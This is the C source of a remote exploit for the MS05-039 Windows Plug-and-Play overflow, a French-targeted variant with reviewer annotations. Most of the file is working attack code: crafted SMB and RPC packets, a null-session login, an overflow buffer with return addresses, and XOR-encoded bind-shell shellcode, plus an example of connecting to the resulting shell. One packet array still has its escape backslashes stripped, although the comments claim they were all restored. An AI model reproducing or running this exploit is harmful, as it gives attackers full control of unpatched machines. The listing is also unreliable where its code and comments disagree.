
# Title : MS Windows Plug-and-Play Service Remote Universal Exploit (french fix)
# Published : 2005-08-25
# Author : Fabrice Mourron


/*
 * HOD-ms05039-pnp-expl-french.c [25.Aug.2005]
 * Very slightly modified version by Fabrice MOURRON <fmourron@exaprobe.com>
 * Tested on Win2k SP4 French (only the return address for the French
 * umpnpmgr.dll was changed; see RPC_call below)
 * Original credits & comments follow.
 */


/* HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2
 *
 * Copyright (c) 2005 houseofdabus.
 *
 * (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
 * Universal Exploit + no crash shellcode
 *
 *
 *
 *
 *                 .::[ houseofdabus ]::.
 *
 *
 *
 * ---------------------------------------------------------------------
 * Description:
 *    A remote code execution and local elevation of privilege
 *    vulnerability exists in Plug and Play that could allow an
 *    attacker who successfully exploited this vulnerability to take
 *    complete control of the affected system.
 *
 *    This is a remote code execution and local privilege elevation
 *    vulnerability. On Windows 2000, an anonymous attacker could
 *    remotely try to exploit this vulnerability.
 *
 *    On Windows XP Service Pack 1, only an authenticated user could
 *    remotely try to exploit this vulnerability.
 *    On Windows XP Service Pack 2 and Windows Server 2003, only an
 *    administrator can remotely access the affected component.
 *    Therefore, on Windows XP Service Pack 2 and Windows Server 2003,
 *    this is strictly a local privilege elevation vulnerability.
 *    An anonymous user cannot remotely attempt to exploit this
 *    vulnerability on Windows XP Service Pack 2 and Windows
 *    Server 2003.
 *
 * ---------------------------------------------------------------------
 * Solution:
 *    http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx
 *
 * ---------------------------------------------------------------------
 * Systems Affected:
 *    - Windows Server 2003, SP1
 *    - Windows XP SP1, SP2
 *    - Windows 2000 SP4
 *
 * ---------------------------------------------------------------------
 * Tested on:
 *    - Windows 2000 SP4
 *
 * ---------------------------------------------------------------------
 * Compile:
 *
 * Win32/VC++  : cl -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
 * Win32/cygwin: gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
 * Linux       : gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
 *
 * ---------------------------------------------------------------------
 * Example:
 *
 * C:\>HOD-ms05039-pnp-expl 192.168.0.1 7777
 *
 * [*] connecting to 192.168.0.1:445...ok
 * [*] null session...ok
 * [*] bind pipe...ok
 * [*] sending crafted packet...ok
 * [*] check your shell on 192.168.0.1:7777
 * Ctrl+C
 *
 * C:\>nc 192.168.0.1 7777
 *
 * Microsoft Windows 2000 [Version 5.00.2195]
 * (C) Copyright 1985-2000 Microsoft Corp.
 *
 * C:\WINNT\system32>
 *
 * ---------------------------------------------------------------------
 *
 * This is provided as proof-of-concept code only for educational
 * purposes and testing by authorized individuals with permission
 * to do so.
 *
 */

/* #define _WIN32 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#endif


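/*
 * SMB Negotiate Protocol request (command byte 0x72 at offset 8) inside a
 * 4-byte NetBIOS session header; [3] = 0x85 = 133 is the length of what
 * follows (array is 137 bytes without the string NUL).  The dialect list
 * is readable in the bytes: "PC NETWORK PROGRAM 1.0", "LANMAN1.0",
 * "Windows for Workgroups 3.1a", "LM1.2X002", "LANMAN2.1", "NT LM 0.12".
 * The published listing had the backslash of every \xNN escape stripped;
 * the raw bytes are restored here.
 */
unsigned char SMB_Negotiate[] =
	"\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
	"\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F"
	"\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02"
	"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F"
	"\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70"
	"\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
	"\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54"
	"\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00";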


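/*
 * First SMB Session Setup AndX (command byte 0x73) of the null session.
 * The security blob is an NTLMSSP message ("NTLMSSP\0" at offset 63,
 * followed by message type 1), then the UTF-16 native OS / LAN manager
 * strings "Windows 2000 2195" and "Windows 2000 5.0".  [3] = 0xA4 = 164
 * is the NetBIOS length (array is 168 bytes).  Escapes restored from the
 * mangled listing.
 */
unsigned char SMB_SessionSetupAndX[] =
	"\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
	"\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00"
	"\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E"
	"\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00"
	"\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00"
	"\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00"
	"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00"
	"\x2E\x00\x30\x00\x00\x00\x00\x00";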


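/*
 * Second Session Setup AndX (command byte 0x73) completing the null
 * session: NTLMSSP message type 3 ("NTLMSSP\0" at offset 63, type byte
 * 0x03 at 71) with a UTF-16 user name "HOD" embedded, then the same
 * OS / LAN manager strings as the first message.  [3] = 0xDA = 218 is
 * the NetBIOS length (array is 222 bytes).  Escapes restored from the
 * mangled listing.
 */
unsigned char SMB_SessionSetupAndX2[] =
	"\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
	"\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00"
	"\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E"
	"\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46"
	"\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40"
	"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40"
	"\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48"
	"\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\xD2\x59\xA0\xB3"
	"\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00"
	"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00"
	"\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00"
	"\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00"
	"\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00";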


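/*
 * Fixed 48-byte head of the Tree Connect AndX request (command byte
 * 0x75).  main() appends the UTF-16 path "\\<host>\IPC$" and the
 * SMB_TreeConnectAndX_ trailer, then patches two fields that depend on
 * the host name: the ByteCount at offset 45 (placeholder 0x2F) and the
 * NetBIOS length at offset 3 (placeholder 0x5A).  Escapes restored from
 * the mangled listing.
 */
unsigned char SMB_TreeConnectAndX[] =
	"\x00\x00\x00\x5A\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
	"\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x00\x2F\x00\x00";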



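/*
 * Trailer appended after the UTF-16 path in the Tree Connect request:
 * two NUL bytes (the path terminator convert_name() does not emit) and
 * the ASCII service string "?????" with its NUL -- 8 bytes, which main()
 * counts into the ByteCount together with the 1-byte password already in
 * the fixed head.  Escapes restored from the mangled listing.
 */
unsigned char SMB_TreeConnectAndX_[] =
	"\x00\x00\x3F\x3F\x3F\x3F\x3F\x00";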


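/*
 * NT Create AndX (command byte 0xA2) opening the named pipe whose UTF-16
 * name "\browser" is readable at the end of the buffer.  [3] = 0x66 = 102
 * is the NetBIOS length (array is 106 bytes).  The PnP interface is then
 * bound over this pipe.  Escapes restored from the mangled listing.
 */
unsigned char SMB_PipeRequest_browser[] =
	"\x00\x00\x00\x66\xFF\x53\x4D\x42\xA2\x00\x00\x00\x00\x18\x07\xC8"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
	"\x00\x08\x40\x00\x18\xFF\x00\xDE\xDE\x00\x10\x00\x16\x00\x00\x00"
	"\x00\x00\x00\x00\x9F\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00"
	"\x02\x00\x00\x00\x03\x13\x00\x00\x5C\x00\x62\x00\x72\x00\x6F\x00"
	"\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00";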


unsigned char SMB_PNPEndpoint[] =
/* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */
	"x00x00x00x9CxFFx53x4Dx42x25x00x00x00x00x18x07xC8"
	"x00x00x00x00x00x00x00x00x00x00x00x00x00x08x78x04"
	"x00x08x50x00x10x00x00x48x00x00x00x00x10x00x00x00"
	"x00x00x00x00x00x00x00x00x00x54x00x48x00x54x00x02"
	"x00x26x00x00x40x59x00x00x5Cx00x50x00x49x00x50x00"
	"x45x00x5Cx00x00x00x40x00x05x00x0Bx03x10x00x00x00"
	"x48x00x00x00x01x00x00x00xB8x10xB8x10x00x00x00x00"
	"x01x00x00x00x00x00x01x00x40x4Ex9Fx8Dx3DxA0xCEx11"
	"x8Fx69x08x00x3Ex30x05x1Bx01x00x00x00x04x5Dx88x8A"
	"xEBx1CxC9x11x9FxE8x08x00x2Bx10x48x60x02x00x00x00";



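/*
 * Head of the 2196-byte request that triggers the overflow: an SMB
 * Transaction (command byte 0x25) whose NetBIOS length 0x0890 (= 2192)
 * already accounts for the full frame main() builds.  Decoded from the
 * bytes:
 *  - DCE-RPC request PDU `05 00 00 03`, frag length 0x083C, call id 1,
 *    alloc hint 0x0824, context 0, opnum 0x36;
 *  - a conformant UTF-16 string (count 0x11) "ROOT\SYSTEM\0000";
 *  - the length words 0x07E0 and 0x07C0, then the overflow area: NOPs
 *    and `EB 08 90 90` (jmp short +8) / return-address pairs.
 * main() copies bind_shellcode right behind this array, fills the rest
 * with NOPs and puts RPC_call_end in the last 12 bytes.
 * Escapes restored from the mangled listing.
 */
unsigned char RPC_call[] =
	"\x00\x00\x08\x90\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04"
	"\x00\x08\x60\x00\x10\x00\x00\x3C\x08\x00\x00\x00\x01\x00\x00\x00"
	"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x3C\x08\x54\x00\x02"
	"\x00\x26\x00\x00\x40\x4D\x08\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
	"\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x00\x03\x10\x00\x00\x00"
	"\x3C\x08\x00\x00\x01\x00\x00\x00\x24\x08\x00\x00\x00\x00\x36\x00"
	"\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x52\x00\x4F\x00"
	"\x4F\x00\x54\x00\x5C\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00"
	"\x4D\x00\x5C\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00"
	"\xFF\xFF\x00\x00\xE0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	"\xC0\x07\x00\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90"

	/* jmp short +8 / 0x76771567 pairs kept from the original (houseofdabus)
	 * build -- these were NOT retargeted for the French umpnpmgr.dll. */
	"\xEB\x08\x90\x90\x67\x15\x77\x76\xEB\x08\x90\x90\x67\x15\x77\x76"
	"\xEB\x08\x90\x90\x67\x15\x77\x76\xEB\x08\x90\x90\x67\x15\x77\x76"
	"\xEB\x08\x90\x90\x67\x15\x77\x76\xEB\x08\x90\x90\x67\x15\x77\x76"
	"\xEB\x08\x90\x90\x67\x15\x77\x76\xEB\x08\x90\x90\x67\x15\x77\x76"

	/* jmp over - entry point */
	"\xEB\x08\x90\x90"

	/* pop reg; pop reg; retn; in the French umpnpmgr.dll: 0x76741567.
	 * This is the only address the French fix changed; the surrounding
	 * copies still hold 0x76771567.  NOTE(review): which copy the
	 * overflow actually lands on is not visible from this listing --
	 * the author reports it working on Win2k SP4 French only. */
	"\x67\x15\x74\x76"

	/* A "jmp ebx" gadget in umpnpmgr.dll (0x7677366f) was tried by the
	 * original author and marked BROKEN; it is not used. */

	"\xEB\x08\x90\x90\x67\x15\x77\x76"
	/* NOPs, one more jmp +8, the "HOD" tag (0x48 0x4F 0x44 0x88), NOPs */
	"\x90\x90\x90\x90\x90\x90\x90\xEB\x08\x90\x90\x48\x4F\x44\x88\x90"
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";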


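/*
 * Last 12 bytes of the crafted request (0x07E0, 4, 0, 0 as little-endian
 * dwords); main() copies them to offset 2196 - 12 of the frame, after the
 * NOP padding.  Escapes restored from the mangled listing.
 */
unsigned char RPC_call_end[] =
	"\xE0\x07\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00";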


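/*
 * Port-binding payload (344 bytes), XOR-encoded.  The first 24 bytes are
 * a plain decoder stub, readable from the opcodes:
 *   29 C9              sub ecx, ecx
 *   83 E9 B0           sub ecx, -0x50        ; 80 dwords = 320 bytes
 *   D9 EE              fldz
 *   D9 74 24 F4        fnstenv [esp-0xC]     ; leaks the address of fldz
 *   5B                 pop ebx
 *   81 73 13 19 F5 04 37  xor dword [ebx+0x13], 0x3704F519
 *   83 EB FC           sub ebx, -4
 *   E2 F4              loop
 * so bytes 24..343 are XORed with the repeating key 19 F5 04 37.  The
 * listener port sits at offset 186 (see SET_PORTBIND_PORT); 186 - 24 is
 * 2 mod 4, so its two bytes are XORed with 04 and 37, which is why main()
 * pre-masks the port with 0x0437 before storing it in network order.
 * The "HOD" bytes at offset 283 of RPC_call and the nc example in the
 * header are the only evidence this is a bind shell; the decoded body is
 * not analysed here.  Escapes restored from the mangled listing.
 */
unsigned char bind_shellcode[] =
	"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19"
	"\xf5\x04\x37\x83\xeb\xfc\xe2\xf4\xe5\x9f\xef\x7a\xf1\x0c\xfb\xc8"
	"\xe6\x95\x8f\x5b\x3d\xd1\x8f\x72\x25\x7e\x78\x32\x61\xf4\xeb\xbc"
	"\x56\xed\x8f\x68\x39\xf4\xef\x7e\x92\xc1\x8f\x36\xf7\xc4\xc4\xae"
	"\xb5\x71\xc4\x43\x1e\x34\xce\x3a\x18\x37\xef\xc3\x22\xa1\x20\x1f"
	"\x6c\x10\x8f\x68\x3d\xf4\xef\x51\x92\xf9\x4f\xbc\x46\xe9\x05\xdc"
	"\x1a\xd9\x8f\xbe\x75\xd1\x18\x56\xda\xc4\xdf\x53\x92\xb6\x34\xbc"
	"\x59\xf9\x8f\x47\x05\x58\x8f\x77\x11\xab\x6c\xb9\x57\xfb\xe8\x67"
	"\xe6\x23\x62\x64\x7f\x9d\x37\x05\x71\x82\x77\x05\x46\xa1\xfb\xe7"
	"\x71\x3e\xe9\xcb\x22\xa5\xfb\xe1\x46\x7c\xe1\x51\x98\x18\x0c\x35"
	"\x4c\x9f\x06\xc8\xc9\x9d\xdd\x3e\xec\x58\x53\xc8\xcf\xa6\x57\x64"
	"\x4a\xa6\x47\x64\x5a\xa6\xfb\xe7\x7f\x9d\x1a\x55\x7f\xa6\x8d\xd6"
	"\x8c\x9d\xa0\x2d\x69\x32\x53\xc8\xcf\x9f\x14\x66\x4c\x0a\xd4\x5f"
	"\xbd\x58\x2a\xde\x4e\x0a\xd2\x64\x4c\x0a\xd4\x5f\xfc\xbc\x82\x7e"
	"\x4e\x0a\xd2\x67\x4d\xa1\x51\xc8\xc9\x66\x6c\xd0\x60\x33\x7d\x60"
	"\xe6\x23\x51\xc8\xc9\x93\x6e\x53\x7f\x9d\x67\x5a\x90\x10\x6e\x67"
	"\x40\xdc\xc8\xbe\xfe\x9f\x40\xbe\xfb\xc4\xc4\xc4\xb3\x0b\x46\x1a"
	"\xe7\xb7\x28\xa4\x94\x8f\x3c\x9c\xb2\x5e\x6c\x45\xe7\x46\x12\xc8"
	"\x6c\xb1\xfb\xe1\x42\xa2\x56\x66\x48\xa4\x6e\x36\x48\xa4\x51\x66"
	"\xe6\x25\x6c\x9a\xc0\xf0\xca\x64\xe6\x23\x6e\xc8\xe6\xc2\xfb\xe7"
	"\x92\xa2\xf8\xb4\xdd\x91\xfb\xe1\x4b\x0a\xd4\x5f\xf6\x3b\xe4\x57"
	"\x4a\x0a\xd2\xc8\xc9\xf5\x04\x37";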

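/*
 * Patch the listener port into bind_shellcode.  The port field is the
 * 16-bit value at byte offset 186 of the array; the caller is expected to
 * pass it already XOR-masked and in network byte order (see main()).
 * The listing lost the line-continuation backslash of this macro, which
 * turned the second line into a stray file-scope statement.  It is also
 * written with memcpy instead of a `*(unsigned short *)` store so the
 * access is neither misaligned nor a strict-aliasing violation on the
 * unsigned char array; the bytes written are identical.
 */
#define SET_PORTBIND_PORT(buf, port) \
	do { \
		unsigned short pb_port_ = (port); \
		memcpy((buf) + 186, &pb_port_, sizeof pb_port_); \
	} while (0)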


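/*
 * Widen an ASCII string to UTF-16LE: every byte of `name` is written to
 * `out` followed by a 0x00.  Exactly 2*strlen(name) bytes are written and
 * NO terminator is added -- the caller appends its own trailer.  `out`
 * must have room for 2*strlen(name) bytes.  The conversion runs from the
 * last character backwards, so it is safe even if `out` aliases `name`
 * (each input byte is consumed before anything at or above its position
 * is overwritten).
 *
 * Fixes versus the listing: the NUL was spelled 'x00' (a multi-character
 * constant, not zero) because the escape's backslash was stripped, and an
 * empty name formed the out-of-bounds pointer `out - 1`.
 */
void
convert_name(char *out, const char *name)
{
	size_t i, n = strlen(name);

	for (i = n; i-- > 0; ) {
		out[2 * i + 1] = '\0';
		out[2 * i] = name[i];
	}
}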



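#ifdef _WIN32
#define CLOSE_SOCKET(s) closesocket(s)
#else
#define CLOSE_SOCKET(s) close(s)
#endif

/*
 * One SMB round trip: send `req`, read the reply and sanity-check it.
 * The reply must be longer than 10 bytes (4-byte NetBIOS header plus the
 * start of the SMB header -- the original's `len <= 10` test, kept as is)
 * and, when `check_status` is set, the byte at offset 9 (low byte of the
 * NT status) must be zero.  Prints the same diagnostics the original
 * printed inline.  Returns 0 on success, -1 on any failure.
 */
static int
smb_exchange(int fd, const unsigned char *req, size_t reqlen, int check_status)
{
	char reply[4096];
	int got;

	if (send(fd, (const char *)req, (int)reqlen, 0) < 0) {
		printf("\n[-] send failed\n");
		return -1;
	}
	got = recv(fd, reply, sizeof reply, 0);
	if (got <= 10 || (check_status && reply[9] != 0)) {
		printf("\n[-] failed\n");
		return -1;
	}
	return 0;
}

/*
 * Entry point: <host> <bind port>.
 *
 * Walks the target through a null SMB session on TCP/445 (negotiate,
 * NTLMSSP session setup in two steps, tree connect to \\<host>\IPC$),
 * opens the \browser pipe, binds the PnP RPC interface over it and sends
 * the 2196-byte crafted request carrying bind_shellcode.  After that a
 * single blocking recv() waits for the server to react; its content is
 * ignored.  The shell is expected on <host>:<bind port>.
 *
 * Reviewer changes versus the published listing: the backslash of every
 * escape sequence (\n, \t, \x90, \\) is restored; the host name is
 * bounded before it is formatted into `tmp` (the original sprintf could
 * overflow the 1024-byte buffer); the two length fields of the tree
 * connect request are written byte-wise (the original memcpy'd the low
 * byte of a host-order short, which only works on little-endian hosts and
 * for paths under 256 bytes); the bind port is range-checked instead of
 * being silently truncated by atoi; the socket is closed on every path
 * and failures exit non-zero.
 */
int
main (int argc, char **argv)
{
	enum {
		SMB_PORT = 445,
		CRAFTED_LEN = 2196,    /* NetBIOS length in RPC_call (0x0890) + 4 */
		PORT_XOR_KEY = 0x0437  /* compensates the decoder stub's XOR of the
		                          two port bytes in bind_shellcode */
	};
	struct sockaddr_in addr;
	struct hostent *he;
	int sockfd = -1;
	int rc = EXIT_FAILURE;
	long port;
	char *end;
	unsigned short bindport;
	size_t hdrlen, pathlen, bytecount, total;
	unsigned char tmp[1024];
	unsigned char packet[4096];
	unsigned char *ptr;
	char recvbuf[4096];

#ifdef _WIN32
	WSADATA wsa;
	if (WSAStartup(MAKEWORD(2, 0), &wsa) != 0) {
		printf("[-] WSAStartup failed\n");
		return EXIT_FAILURE;
	}
#endif

	printf("\n      (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
	printf("\t         Universal Exploit + no crash shellcode\n\n");
	printf("\t         [French hack by ExaProbe :-)]\n\n\n");
	printf("\t            Copyright (c) 2005 .: houseofdabus :.\n\n\n");

	if (argc < 3) {
		printf("%s <host> <bind port>\n", argv[0]);
		goto out;
	}

	/* The port is patched into the shellcode as a 16-bit value, so
	 * anything outside 1..65535 would be silently truncated. */
	port = strtol(argv[2], &end, 10);
	if (end == argv[2] || *end != '\0' || port < 1 || port > 65535) {
		printf("[-] bad bind port '%s' (expected 1..65535)\n", argv[2]);
		goto out;
	}

	if ((he = gethostbyname(argv[1])) == NULL || he->h_addrtype != AF_INET
	    || he->h_addr_list[0] == NULL) {
		printf("[-] Unable to resolve %s\n", argv[1]);
		goto out;
	}

	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
		printf("[-] socket failed\n");
		goto out;
	}

	memset(&addr, 0, sizeof addr);
	addr.sin_family = AF_INET;
	addr.sin_port = htons(SMB_PORT);
	memcpy(&addr.sin_addr, he->h_addr_list[0], sizeof addr.sin_addr);

	printf("\n[*] connecting to %s:445...", argv[1]);
	fflush(stdout);
	if (connect(sockfd, (struct sockaddr *)&addr, sizeof addr) < 0) {
		printf("\n[-] connect failed\n");
		goto out;
	}
	printf("ok\n");

	printf("[*] null session...");
	fflush(stdout);
	if (smb_exchange(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate) - 1, 1) < 0)
		goto out;
	/* NTLMSSP type 1: the original did not check the status byte here
	 * (presumably the server answers "more processing required"). */
	if (smb_exchange(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX) - 1, 0) < 0)
		goto out;
	if (smb_exchange(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2) - 1, 1) < 0)
		goto out;

	/* Tree Connect AndX to \\<host>\IPC$ -- the only request whose size
	 * depends on input, so its two length fields are filled in here. */
	if (snprintf((char *)tmp, sizeof tmp, "\\\\%s\\IPC$", argv[1]) >= (int)sizeof tmp) {
		printf("\n[-] host name too long\n");
		goto out;
	}
	hdrlen = sizeof(SMB_TreeConnectAndX) - 1;
	pathlen = strlen((char *)tmp) * 2;          /* UTF-16LE, no terminator */

	ptr = packet;
	memcpy(ptr, SMB_TreeConnectAndX, hdrlen);
	ptr += hdrlen;
	convert_name((char *)ptr, (char *)tmp);
	ptr += pathlen;
	memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_) - 1);
	ptr += sizeof(SMB_TreeConnectAndX_) - 1;

	/* ByteCount, 16-bit little-endian, 3 bytes before the end of the
	 * fixed head: the 1-byte password already in the head, the path and
	 * the 8-byte trailer (the original's strlen*2 + 9). */
	bytecount = 1 + pathlen + (sizeof(SMB_TreeConnectAndX_) - 1);
	packet[hdrlen - 3] = (unsigned char)(bytecount & 0xFF);
	packet[hdrlen - 2] = (unsigned char)((bytecount >> 8) & 0xFF);

	/* NetBIOS session header: 24-bit big-endian length of everything
	 * after the 4-byte header itself. */
	total = (size_t)(ptr - packet) - 4;
	packet[1] = (unsigned char)((total >> 16) & 0xFF);
	packet[2] = (unsigned char)((total >> 8) & 0xFF);
	packet[3] = (unsigned char)(total & 0xFF);

	if (smb_exchange(sockfd, packet, (size_t)(ptr - packet), 1) < 0)
		goto out;
	printf("ok\n");

	printf("[*] bind pipe...");
	fflush(stdout);
	if (smb_exchange(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser) - 1, 1) < 0)
		goto out;
	if (smb_exchange(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint) - 1, 1) < 0)
		goto out;
	printf("ok\n");

	printf("[*] sending crafted packet...");
	fflush(stdout);

	/* Frame layout: RPC_call head, bind_shellcode right behind it, NOP
	 * filler, RPC_call_end in the last 12 bytes.  Guard the layout in
	 * case someone swaps in a longer payload. */
	if (sizeof(RPC_call) - 1 + sizeof(bind_shellcode) - 1
	    > CRAFTED_LEN - (sizeof(RPC_call_end) - 1)) {
		printf("\n[-] shellcode does not fit in the request\n");
		goto out;
	}
	memset(packet, 0x90, sizeof packet);
	memcpy(packet, RPC_call, sizeof(RPC_call) - 1);

	/* Pre-mask the port so the decoder stub's XOR leaves the real value
	 * in network byte order at offset 186 of the shellcode. */
	bindport = (unsigned short)(port ^ PORT_XOR_KEY);
	SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
	memcpy(packet + sizeof(RPC_call) - 1, bind_shellcode, sizeof(bind_shellcode) - 1);

	memcpy(packet + CRAFTED_LEN - (sizeof(RPC_call_end) - 1),
	       RPC_call_end, sizeof(RPC_call_end) - 1);

	if (send(sockfd, (const char *)packet, CRAFTED_LEN, 0) < 0) {
		printf("\n[-] send failed\n");
		goto out;
	}
	printf("ok\n");
	printf("[*] check your shell on %s:%ld\n", argv[1], port);

	/* Block until the server answers or drops the connection; the reply
	 * itself is not used. */
	recv(sockfd, recvbuf, sizeof recvbuf, 0);
	rc = EXIT_SUCCESS;

out:
	if (sockfd >= 0)
		CLOSE_SOCKET(sockfd);
#ifdef _WIN32
	WSACleanup();
#endif
	return rc;
}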
